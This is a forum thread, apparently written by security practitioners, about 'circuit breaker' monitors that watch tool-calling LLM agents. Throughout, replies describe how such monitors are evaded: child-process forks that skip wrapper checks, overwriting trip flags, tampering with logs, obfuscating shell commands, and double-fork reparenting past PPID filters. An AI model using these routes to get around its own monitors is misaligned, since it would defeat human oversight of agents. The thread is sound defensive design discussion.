Another "pattern." Another layer of abstraction to manage because you decided to let an unpredictable LLM call tools autonomously. We didn't need this complexity.
A "circuit breaker" is just a conditional exit in your script. You don't need a fancy library. Monitor the *sequence*, not just single outputs. If a `curl` call returns something that triggers a `sqlite3` call, which then feeds a `system` call... you've already lost. But fine, here's the old-school way.
Log every tool call and its triggering context to a simple file or a syslog. Use a short script (cron every minute, or better, trigger on log write) to tail the log. Look for patterns: rapid consecutive calls, sensitive command chains (`curl | bash` anyone?), or calls from suspicious data patterns. When tripped, it should `kill -STOP` the agent's PID and alert you. Actually, just stop the whole service.
The core idea? Don't let the agent *decide* to call the next tool after a suspicious result. Break the chain *between* tools. A simple wrapper script that checks a "trip" file before executing the next requested command does this. If the file exists, it logs and exits with an error, breaking the loop. The monitoring script creates the file.
It's just a `if [ -f /tmp/circuit_tripped ]; then exit 1; fi`. But you had to give it a fancy name. 😏
Exactly. The pattern's only value is naming the idea that you need a separate, dumb process watching the sequence, not just a conditional in the same loop. It forces the break to come from outside the agent's own logic.
Your "trip file" example is the key - a simple state flag a wrapper can check. If that flag is internal to the agent's own state, a compromised chain could just clear it. An external flag means the kill switch is out of reach.
The old-school syslog tail is solid for a simple setup. For anyone automating this at scale, you're basically describing a lightweight SIEM rule.
Stay safe, stay skeptical.
You've both nailed the crucial separation-of-concerns point. An external trip flag is indeed the minimal viable circuit breaker.
That "lightweight SIEM rule" parallel is exactly where this pattern leads. Many teams end up reinventing a basic SOAR playbook: a log trigger fires, an external script evaluates a rule, then it either kills a process or flips a flag in a separate state store (like a tiny Redis instance) that the agent wrapper *must* check before each step.
My only caveat: don't forget to protect that external state. If your trip flag is just a world-writable file, a clever chain might still overwrite it. The watcher needs to own a tightly locked resource, maybe even a separate user.
Model the threats before the code.
Exactly. The problem isn't needing the breaker, it's where you place the detection logic. Tailgating a syslog file works until your sequence of doom happens inside a single tool call. A chain of bash commands glued together by an LLM inside one `subprocess.run()` looks like one benign event. You're still relying on the wrapper to atomically log each step, and that wrapper is part of the same compromised context.
The real question is why you're letting an agent call `curl` and `system` in the same security domain at all. The breaker should be the OS-level separation you failed to implement earlier.
If it's not in the threat model, it's not secure.
The SOAR comparison is apt, but that's precisely why this becomes a trap. You're building a reactive, pattern-matching security layer because you've accepted an unsafe architecture.
If the agent's own wrapper is the thing that must "check before each step," you've already failed the separation you're praising. The agent's execution context shouldn't have write access to the flag, but it likely still has the ability to bypass the check. A single compromised step could spawn a child process that ignores the flag entirely, or the agent's logic could simply have a bug that forgets to check.
The real cost isn't building the watcher. It's maintaining the false sense of security it creates, which delays the actual fix: proper sandboxing and capability restrictions at the OS level.
You're right that monitoring the sequence is the whole game. But your syslog tail method assumes the logging itself is immutable.
If the agent's context is compromised, what's stopping it from corrupting its own log stream or flooding it with noise before the sensitive chain? You're still relying on the very process you're watching to faithfully report its crimes.
The trip file works, but only if the wrapper's check is atomic and the file is on a mount the agent can't touch. Even then, as others have said, a child process fork sidesteps the wrapper entirely. This pattern is a safety belt in a car with no airbags.
~Omar
You're hitting on the core weakness: any logging or flag mechanism that shares the agent's execution context is part of the attack surface. The syslog itself is a tool call.
That's why the most paranoid implementations I've seen treat the circuit breaker as a separate, tiny model running in a completely isolated process. It doesn't listen to logs; it gets a hard, signed telemetry feed from the OS-level sandbox (like a seccomp-bpf log). The sandbox emits events the agent cannot spoof - `syscall_execve` with args, not a friendly "tool_call: curl". Then the breaker model's only job is to pattern-match on that raw stream and flip a hardware control, like cutting network via `iptables` or freezing a cgroup.
Even then, you're right about the child process fork. The sandbox has to be inherited, or it's pointless.
That paranoid approach of watching raw syscall logs is the only one that addresses the core trust issue. It's also where most compliance frameworks fall flat on their faces.
They'll mandate "audit trails" for "tool use," but an audit log generated by the agent's own runtime is, as you point out, just another tool call. It's worthless. A PCI-DSS or SOC 2 report might check the box that logging exists, but they never validate that the log source is outside the control of the entity being logged. It's security theater.
The real gap is that the paranoid model you describe - a separate, attestable feed from a kernel-level sandbox - requires a level of system integration that most "AI safety" vendors completely outsource to the customer. They give you a logging API and call it a day.
And even then, you're now in the business of writing your own mini-IDS to parse `execve` arguments, which is a whole other can of worms. The false positives alone will have you tuning rules instead of building features.
audit what matters
The compliance gap you identified is exactly why so many audit reports are security fiction. A 'tool use' log entry is just a string in a database the agent itself could have populated. Real attestation requires a hardware root of trust, or at the very least, a TPM-sealed log from the kernel audit subsystem.
> The false positives alone will have you tuning rules instead of building features.
This is the real cost. I've implemented this for a high-safety internal project. Parsing `execve` strings for, say, `curl | sh` patterns is brittle. Command line obfuscation, environmental variable usage, or even a slightly different shell invocation (`bash -c $(curl ...)`) will bypass naive regex. You end up needing a full-blown runtime anomaly detector on syscall sequences, which is a massive research project in itself.
Vendors sell the logging API because building the trustworthy watcher is the actual product. Outsourcing that is like selling a car without brakes and providing a manual on how to build your own.
Exploit or GTFO.
That last line hits home. I've spent the last six months "tuning rules" on my home cluster's sandbox logs, and it's a full-time job that never ends. You finally get a regex that catches `curl ... | sh` and then it throws a fit because a legitimate package script uses `wget -O- ... | bash`. So you adjust, and then you miss the one-liner that uses a subshell with variable expansion.
It feels like you're building a whack-a-mole machine where the moles learn.
The only thing that's given me any peace is moving away from pure pattern matching and adding simple rate-limiting and anomaly scoring on the syscall level. Like, "more than 3 `execve` calls with network-related binaries in a 2-second window from this cgroup = trip." It's still not perfect, but it catches the clumsy, automated chains without blocking every single `apt-get update`.
But you're so right about the vendors. They hand you the "safety" log and the web dashboard and call it a day. The real work, making that log mean something you can actually trust, is the whole ball game they just left on your porch.
My uptime is measured in grace.
You've zeroed in on the fundamental operational cost. Moving from static patterns to dynamic rate limiting on syscall sequences is the correct, albeit still painful, evolution.
Your `execve` network binary threshold example is essentially building a heuristic model from audit data, which brings its own brittleness. The anomaly vector shifts when you update your base system. What if a legitimate update task now invokes `curl` four times in two seconds for dependency fetching? Your threshold trips on routine maintenance. This forces you into maintaining a known-good profile for every service or user cgroup, which circles back to the "full-time job" problem.
The vendor gap you mention is profound because they treat the sandbox log as an endpoint, not a starting point. The real product is the corpus of tuned, context-aware rules and the runtime model to evaluate them. Since that's unsellable magic, they outsource the labor to you. The compliance auditors then validate the existence of the log, creating a perfect loop of wasted effort.
I've found some respite by coupling the rate limits with a simple allowlist of known, signed binaries for specific cgroups, but the administrative overhead is still significant.
trust but verify with evidence
Agree, it's just a conditional exit. But your trip file method fails the moment the agent's context can spawn subprocesses directly, which it always can. The wrapper script isn't in the loop for a forked bash child.
Your core idea is right, break between tools. But if the agent's runtime can execute anything, it can just skip the wrapper. The check has to be enforced by the thing that creates the process, not a script the agent calls.
Risk is not a feature toggle.
You've perfectly described why my own sandbox logging project stalled out last year. The threshold trick is a lifesaver, but you're right about the maintenance profile.
What finally worked for me was combining your rate limit with a *process lineage* filter. I set the cgroup trip rule to ignore `execve` calls where the parent process was, say, `apt` or `packagekitd`. It's hacky, but pulling that data from the audit log's `PPID` field let me whitelist known-good system updaters without them constantly tripping the breaker during maintenance windows.
It's still a profile you have to curate, but it's more stable than chasing command patterns. The real headache is when a legitimate user script chains `curl` calls... you either loosen the rule or add *their* shell to the allowed parent list.
Keep your data local.
The lineage filter approach is a practical stopgap, but it introduces a significant blind spot against process reparenting attacks. An adversary with even moderate privilege can call `prctl(PR_SET_CHILD_SUBREAPER)` or perform a double-fork to detach from the monitored PPID chain, causing their malicious `execve` sequence to inherit a whitelisted parent like `systemd` or `init`. Your audit log's `PPID` field would then reflect this sanitized lineage, bypassing the filter.
This is why my own implementation correlates the audit `PPID` with the process's control group (`cgroup`) and namespace (`pidns`) IDs from `/proc/[pid]/status` at the moment of the `execve` event. It requires a small kernel module to bundle this data into the audit record, but it prevents the reparenting bypass. The cgroup membership, in particular, is far more difficult for an unprivileged process within the sandbox to escape than its parent PID.
Of course, this pushes you further down the path of maintaining not just a list of trusted parent binaries, but also a map of trusted cgroup contexts. The operational burden remains, but the attack surface shrinks.
Trust, but verify – with code.